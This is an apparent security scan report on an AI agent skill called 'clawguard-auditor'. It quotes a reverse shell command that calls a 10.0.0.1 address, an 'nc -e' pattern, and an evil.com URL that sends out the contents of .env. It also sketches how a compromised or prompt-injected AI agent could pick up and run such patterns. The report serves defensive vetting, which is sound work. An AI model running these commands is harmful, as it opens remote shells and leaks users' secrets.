中文 EN

Scan Report

Scan New Files

Suspicious — Risk Score 42/100
Last scan:2 days ago Rescan
42 /100
clawguard-auditor
Enterprise-grade Security Kernel, SAST Vetter, and Active DLP Engine for OpenClaw
Security auditor skill contains embedded reverse shell patterns (nc -e, bash -i >& /dev/tcp) and data exfiltration examples (evil.com/?data=$(cat .env)) within documentation. No executable code files present, but the skill specification describes extensive capabilities (filesystem:WRITE, network:READ, shell:ADMIN) without implementation.
Skill Nameclawguard-auditor
Duration74.2s
Enginepi
Use with caution
Do not install this skill. The documentation contains dangerous pattern examples that could be extracted by a compromised AI agent, and the skill describes capabilities far exceeding what documentation-only implementation requires.

Attack Chain 4 steps

Entry Skill masquerades as legitimate security auditor
SKILL.md:1
Escalation Documentation embeds reverse shell patterns as 'detection examples'
SKILL.md:55
Escalation AI agent extracts and interprets embedded patterns during skill processing
SKILL.md:55
Impact Potential execution of nc -e /dev/tcp or bash reverse shell commands
SKILL.md:55

Findings 4 items

Severity Finding Location
High
Embedded reverse shell command patterns
SKILL.md contains literal strings 'nc -e' and 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' at line 55 within a list of 'red flags to detect'. While in context these are examples, they represent dangerous patterns that could be extracted by prompt injection or interpreted by a compromised AI agent.
reverse shell signatures (`nc -e`, `bash -i >& /dev/tcp`)
→ Remove or escape dangerous patterns in documentation. Use generic descriptions like 'network connection backdoors' instead of literal command syntax.
 SKILL.md:55
Medium
Data exfiltration pattern example
SKILL.md contains 'http://evil.com/?data=$(cat .env)' as an example of what the DLP engine should block. This embeds a real exfiltration technique as instructional content.
http://evil.com/?data=$(cat .env)
→ Replace with generic description: 'URL parameter data exfiltration attempts'.
 SKILL.md:99
Medium
Capabilities exceed implementation
The skill describes requiring CAP_FS_WRITE, CAP_NET_EGRESS, CAP_SYS_EXEC, and CAP_FS_READ_SENSITIVE capabilities, but no executable code files exist. This creates a mismatch between declared purpose and actual functionality.
CAP_FS_WRITE: Modify workspace files
→ If this is documentation-only, declare NONE for all resource levels.
 SKILL.md:25
Low
Documentation-only implementation
All files are Markdown or JSON with no scripts/, requirements.txt, package.json, or any executable code. The skill is a specification without implementation.
--- name: clawguard-auditor
→ Verify if actual implementation files exist or are expected.
 SKILL.md:1
ResourceDeclaredInferredStatusEvidence
Filesystem WRITE NONE ✓ Aligned SKILL.md describes CAP_FS_WRITE capability but no code exists to exercise it
Network READ NONE ✓ Aligned SKILL.md describes NET_EGRESS token but no network code present
Shell ADMIN NONE ✓ Aligned No shell scripts or subprocess calls in any file
Environment READ NONE ✓ Aligned Mentions credential access but no code implements it
2 Critical 3 findings
💀
Critical Dangerous Command 危险 Shell 命令
nc -e
SKILL.md:55
💀
Critical Dangerous Command 危险 Shell 命令
bash -i >&
SKILL.md:55
🔗
Medium External URL 外部 URL
http://evil.com/?data=$(cat
SKILL.md:99

File Tree

3 files · 13.8 KB · 271 lines
Markdown 2f · 263L JSON 1f · 8L
├─ 📋 _meta.json JSON 8L · 286 B
├─ 📝 README.md Markdown 114L · 6.0 KB
└─ 📝 SKILL.md Markdown 149L · 7.6 KB

Security Positives

✓ No executable scripts or binary files present
✓ No actual network connections or data exfiltration attempted
✓ No credential harvesting code implemented
✓ No base64-encoded payloads or obfuscated code
✓ Patterns appear in documented 'detection examples' context rather than as instructions